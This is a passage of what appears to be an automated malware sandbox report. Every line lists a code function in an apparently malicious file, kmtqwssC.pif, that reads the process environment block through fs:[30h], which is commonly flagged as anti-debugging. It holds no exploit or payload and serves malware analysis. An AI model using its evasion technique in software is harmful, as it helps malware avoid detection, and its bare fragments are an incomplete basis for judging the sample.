                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF0BCB mov eax, dword ptr fs:[00000030h]6_2_2CDF0BCB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF0BCB mov eax, dword ptr fs:[00000030h]6_2_2CDF0BCB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF0BCB mov eax, dword ptr fs:[00000030h]6_2_2CDF0BCB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5CBF0 mov eax, dword ptr fs:[00000030h]6_2_2CE5CBF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEBFC mov eax, dword ptr fs:[00000030h]6_2_2CDFEBFC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8BF0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8BF0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8BF0 mov eax, dword ptr fs:[00000030h]6_2_2CDD8BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7EBD0 mov eax, dword ptr fs:[00000030h]6_2_2CE7EBD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE84BB0 mov eax, dword ptr fs:[00000030h]6_2_2CE84BB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE84BB0 mov eax, dword ptr fs:[00000030h]6_2_2CE84BB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0BBE mov eax, dword ptr fs:[00000030h]6_2_2CDE0BBE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0BBE mov eax, dword ptr fs:[00000030h]6_2_2CDE0BBE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCCB7E mov eax, dword ptr fs:[00000030h]6_2_2CDCCB7E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE84B4B mov eax, dword ptr fs:[00000030h]6_2_2CE84B4B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE84B4B mov eax, dword ptr fs:[00000030h]6_2_2CE84B4B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE78B42 mov eax, dword ptr fs:[00000030h]6_2_2CE78B42
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66B40 mov eax, dword ptr fs:[00000030h]6_2_2CE66B40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66B40 mov eax, dword ptr fs:[00000030h]6_2_2CE66B40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9AB40 mov eax, dword ptr fs:[00000030h]6_2_2CE9AB40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7EB50 mov eax, dword ptr fs:[00000030h]6_2_2CE7EB50
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE98B28 mov eax, dword ptr fs:[00000030h]6_2_2CE98B28
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE98B28 mov eax, dword ptr fs:[00000030h]6_2_2CE98B28
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4EB1D mov eax, dword ptr fs:[00000030h]6_2_2CE4EB1D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEB20 mov eax, dword ptr fs:[00000030h]6_2_2CDFEB20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFEB20 mov eax, dword ptr fs:[00000030h]6_2_2CDFEB20
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD04E5 mov ecx, dword ptr fs:[00000030h]6_2_2CDD04E5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE044B0 mov ecx, dword ptr fs:[00000030h]6_2_2CE044B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5A4B0 mov eax, dword ptr fs:[00000030h]6_2_2CE5A4B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD64AB mov eax, dword ptr fs:[00000030h]6_2_2CDD64AB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC645D mov eax, dword ptr fs:[00000030h]6_2_2CDC645D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF245A mov eax, dword ptr fs:[00000030h]6_2_2CDF245A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5C460 mov ecx, dword ptr fs:[00000030h]6_2_2CE5C460
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E443 mov eax, dword ptr fs:[00000030h]6_2_2CE0E443
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFA470 mov eax, dword ptr fs:[00000030h]6_2_2CDFA470
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFA470 mov eax, dword ptr fs:[00000030h]6_2_2CDFA470
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFA470 mov eax, dword ptr fs:[00000030h]6_2_2CDFA470
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56420 mov eax, dword ptr fs:[00000030h]6_2_2CE56420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A430 mov eax, dword ptr fs:[00000030h]6_2_2CE0A430
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08402 mov eax, dword ptr fs:[00000030h]6_2_2CE08402
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08402 mov eax, dword ptr fs:[00000030h]6_2_2CE08402
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08402 mov eax, dword ptr fs:[00000030h]6_2_2CE08402
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCC427 mov eax, dword ptr fs:[00000030h]6_2_2CDCC427
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCE420 mov eax, dword ptr fs:[00000030h]6_2_2CDCE420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCE420 mov eax, dword ptr fs:[00000030h]6_2_2CDCE420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCE420 mov eax, dword ptr fs:[00000030h]6_2_2CDCE420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD65D0 mov eax, dword ptr fs:[00000030h]6_2_2CDD65D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C5ED mov eax, dword ptr fs:[00000030h]6_2_2CE0C5ED
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C5ED mov eax, dword ptr fs:[00000030h]6_2_2CE0C5ED
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E5CF mov eax, dword ptr fs:[00000030h]6_2_2CE0E5CF
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E5CF mov eax, dword ptr fs:[00000030h]6_2_2CE0E5CF
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A5D0 mov eax, dword ptr fs:[00000030h]6_2_2CE0A5D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A5D0 mov eax, dword ptr fs:[00000030h]6_2_2CE0A5D0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE5E7 mov eax, dword ptr fs:[00000030h]6_2_2CDFE5E7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE5E7 mov eax, dword ptr fs:[00000030h]6_2_2CDFE5E7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE5E7 mov eax, dword ptr fs:[00000030h]6_2_2CDFE5E7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE5E7 mov eax, dword ptr fs:[00000030h]6_2_2CDFE5E7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE5E7 mov eax, dword ptr fs:[00000030h]6_2_2CDFE5E7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE5E7 mov eax, dword ptr fs:[00000030h]6_2_2CDFE5E7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE5E7 mov eax, dword ptr fs:[00000030h]6_2_2CDFE5E7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE5E7 mov eax, dword ptr fs:[00000030h]6_2_2CDFE5E7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD25E0 mov eax, dword ptr fs:[00000030h]6_2_2CDD25E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE505A7 mov eax, dword ptr fs:[00000030h]6_2_2CE505A7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE505A7 mov eax, dword ptr fs:[00000030h]6_2_2CE505A7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE505A7 mov eax, dword ptr fs:[00000030h]6_2_2CE505A7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2582 mov eax, dword ptr fs:[00000030h]6_2_2CDD2582
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2582 mov ecx, dword ptr fs:[00000030h]6_2_2CDD2582
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE04588 mov eax, dword ptr fs:[00000030h]6_2_2CE04588
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF45B1 mov eax, dword ptr fs:[00000030h]6_2_2CDF45B1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF45B1 mov eax, dword ptr fs:[00000030h]6_2_2CDF45B1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E59C mov eax, dword ptr fs:[00000030h]6_2_2CE0E59C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0656A mov eax, dword ptr fs:[00000030h]6_2_2CE0656A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0656A mov eax, dword ptr fs:[00000030h]6_2_2CE0656A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0656A mov eax, dword ptr fs:[00000030h]6_2_2CE0656A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8550 mov eax, dword ptr fs:[00000030h]6_2_2CDD8550
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8550 mov eax, dword ptr fs:[00000030h]6_2_2CDD8550
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE53E mov eax, dword ptr fs:[00000030h]6_2_2CDFE53E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE53E mov eax, dword ptr fs:[00000030h]6_2_2CDFE53E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE53E mov eax, dword ptr fs:[00000030h]6_2_2CDFE53E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE53E mov eax, dword ptr fs:[00000030h]6_2_2CDFE53E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFE53E mov eax, dword ptr fs:[00000030h]6_2_2CDFE53E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE66500 mov eax, dword ptr fs:[00000030h]6_2_2CE66500
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4500 mov eax, dword ptr fs:[00000030h]6_2_2CEA4500
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4500 mov eax, dword ptr fs:[00000030h]6_2_2CEA4500
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4500 mov eax, dword ptr fs:[00000030h]6_2_2CEA4500
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4500 mov eax, dword ptr fs:[00000030h]6_2_2CEA4500
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4500 mov eax, dword ptr fs:[00000030h]6_2_2CEA4500
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4500 mov eax, dword ptr fs:[00000030h]6_2_2CEA4500
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA4500 mov eax, dword ptr fs:[00000030h]6_2_2CEA4500
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0535 mov eax, dword ptr fs:[00000030h]6_2_2CDE0535
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0535 mov eax, dword ptr fs:[00000030h]6_2_2CDE0535
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0535 mov eax, dword ptr fs:[00000030h]6_2_2CDE0535
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0535 mov eax, dword ptr fs:[00000030h]6_2_2CDE0535
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0535 mov eax, dword ptr fs:[00000030h]6_2_2CDE0535
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0535 mov eax, dword ptr fs:[00000030h]6_2_2CDE0535
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE506F1 mov eax, dword ptr fs:[00000030h]6_2_2CE506F1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE506F1 mov eax, dword ptr fs:[00000030h]6_2_2CE506F1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4E6F2 mov eax, dword ptr fs:[00000030h]6_2_2CE4E6F2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4E6F2 mov eax, dword ptr fs:[00000030h]6_2_2CE4E6F2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4E6F2 mov eax, dword ptr fs:[00000030h]6_2_2CE4E6F2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4E6F2 mov eax, dword ptr fs:[00000030h]6_2_2CE4E6F2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A6C7 mov ebx, dword ptr fs:[00000030h]6_2_2CE0A6C7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A6C7 mov eax, dword ptr fs:[00000030h]6_2_2CE0A6C7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C6A6 mov eax, dword ptr fs:[00000030h]6_2_2CE0C6A6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD4690 mov eax, dword ptr fs:[00000030h]6_2_2CDD4690
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD4690 mov eax, dword ptr fs:[00000030h]6_2_2CDD4690
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE066B0 mov eax, dword ptr fs:[00000030h]6_2_2CE066B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A660 mov eax, dword ptr fs:[00000030h]6_2_2CE0A660
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0A660 mov eax, dword ptr fs:[00000030h]6_2_2CE0A660
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9866E mov eax, dword ptr fs:[00000030h]6_2_2CE9866E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9866E mov eax, dword ptr fs:[00000030h]6_2_2CE9866E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE02674 mov eax, dword ptr fs:[00000030h]6_2_2CE02674
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEC640 mov eax, dword ptr fs:[00000030h]6_2_2CDEC640
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE06620 mov eax, dword ptr fs:[00000030h]6_2_2CE06620
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE08620 mov eax, dword ptr fs:[00000030h]6_2_2CE08620
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4E609 mov eax, dword ptr fs:[00000030h]6_2_2CE4E609
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD262C mov eax, dword ptr fs:[00000030h]6_2_2CDD262C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12619 mov eax, dword ptr fs:[00000030h]6_2_2CE12619
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEE627 mov eax, dword ptr fs:[00000030h]6_2_2CDEE627
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5E7E1 mov eax, dword ptr fs:[00000030h]6_2_2CE5E7E1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDC7C0 mov eax, dword ptr fs:[00000030h]6_2_2CDDC7C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE507C3 mov eax, dword ptr fs:[00000030h]6_2_2CE507C3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD47FB mov eax, dword ptr fs:[00000030h]6_2_2CDD47FB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD47FB mov eax, dword ptr fs:[00000030h]6_2_2CDD47FB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF27ED mov eax, dword ptr fs:[00000030h]6_2_2CDF27ED
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF27ED mov eax, dword ptr fs:[00000030h]6_2_2CDF27ED
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF27ED mov eax, dword ptr fs:[00000030h]6_2_2CDF27ED
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE847A0 mov eax, dword ptr fs:[00000030h]6_2_2CE847A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7678E mov eax, dword ptr fs:[00000030h]6_2_2CE7678E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD07AF mov eax, dword ptr fs:[00000030h]6_2_2CDD07AF
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0750 mov eax, dword ptr fs:[00000030h]6_2_2CDD0750
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0674D mov esi, dword ptr fs:[00000030h]6_2_2CE0674D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0674D mov eax, dword ptr fs:[00000030h]6_2_2CE0674D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0674D mov eax, dword ptr fs:[00000030h]6_2_2CE0674D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD8770 mov eax, dword ptr fs:[00000030h]6_2_2CDD8770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0770 mov eax, dword ptr fs:[00000030h]6_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54755 mov eax, dword ptr fs:[00000030h]6_2_2CE54755
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12750 mov eax, dword ptr fs:[00000030h]6_2_2CE12750
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12750 mov eax, dword ptr fs:[00000030h]6_2_2CE12750
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5E75D mov eax, dword ptr fs:[00000030h]6_2_2CE5E75D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C720 mov eax, dword ptr fs:[00000030h]6_2_2CE0C720
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C720 mov eax, dword ptr fs:[00000030h]6_2_2CE0C720
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0710 mov eax, dword ptr fs:[00000030h]6_2_2CDD0710
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4C730 mov eax, dword ptr fs:[00000030h]6_2_2CE4C730
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0273C mov eax, dword ptr fs:[00000030h]6_2_2CE0273C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0273C mov ecx, dword ptr fs:[00000030h]6_2_2CE0273C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0273C mov eax, dword ptr fs:[00000030h]6_2_2CE0273C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0C700 mov eax, dword ptr fs:[00000030h]6_2_2CE0C700
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE00710 mov eax, dword ptr fs:[00000030h]6_2_2CE00710
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE560E0 mov eax, dword ptr fs:[00000030h]6_2_2CE560E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE120F0 mov ecx, dword ptr fs:[00000030h]6_2_2CE120F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCC0F0 mov eax, dword ptr fs:[00000030h]6_2_2CDCC0F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD80E9 mov eax, dword ptr fs:[00000030h]6_2_2CDD80E9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE520DE mov eax, dword ptr fs:[00000030h]6_2_2CE520DE
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCA0E3 mov ecx, dword ptr fs:[00000030h]6_2_2CDCA0E3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE680A8 mov eax, dword ptr fs:[00000030h]6_2_2CE680A8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE960B8 mov eax, dword ptr fs:[00000030h]6_2_2CE960B8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE960B8 mov ecx, dword ptr fs:[00000030h]6_2_2CE960B8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD208A mov eax, dword ptr fs:[00000030h]6_2_2CDD208A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2050 mov eax, dword ptr fs:[00000030h]6_2_2CDD2050
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFC073 mov eax, dword ptr fs:[00000030h]6_2_2CDFC073
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE56050 mov eax, dword ptr fs:[00000030h]6_2_2CE56050
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEE016 mov eax, dword ptr fs:[00000030h]6_2_2CDEE016
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEE016 mov eax, dword ptr fs:[00000030h]6_2_2CDEE016
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEE016 mov eax, dword ptr fs:[00000030h]6_2_2CDEE016
